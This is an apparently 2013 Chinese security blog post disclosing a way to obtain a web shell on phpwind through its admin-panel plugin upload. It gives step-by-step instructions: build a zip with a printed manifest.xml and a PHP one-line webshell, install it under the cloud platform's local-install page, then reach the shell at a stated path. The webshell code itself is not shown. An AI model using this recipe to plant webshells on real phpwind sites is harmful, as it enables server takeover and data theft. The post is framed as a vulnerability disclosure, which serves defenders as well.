phpwind后台getshell

后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell.

1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(此处文件名为php.php)。

manifest.xml如下:

<?xml version="1.0" encoding="gbk"?>
<manifest>
<application>
<name>getshell</name>
<alias>getshell</alias>
<version>1.0</version>
<pw-version>1.0</pw-version>
<type>app</type>
<description>getshell
</description>
<charset>gbk</charset>
<website>http://wooyun.org</website>
<author-name>123@wooyun</author-name>
<author-email>root@wooyun.org</author-email>
<author-icon>http://wooyun.org</author-icon>
</application>
    <res>res</res>
</manifest>

将以上文件打包成zip格式。

2.在后台 云平台-》应用管理-》本地安装处上传制作好的安装包,并点击安装。

20130909102626

3.shell为http://127.0.0.1/phpwind/src/extensions/getshell/php.php

本文固定链接: https://www.unhonker.com/bug/1402.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年09月09日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: phpwind后台getshell | 90' s Blog|关注网络信息安全
关键字:

phpwind后台getshell:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!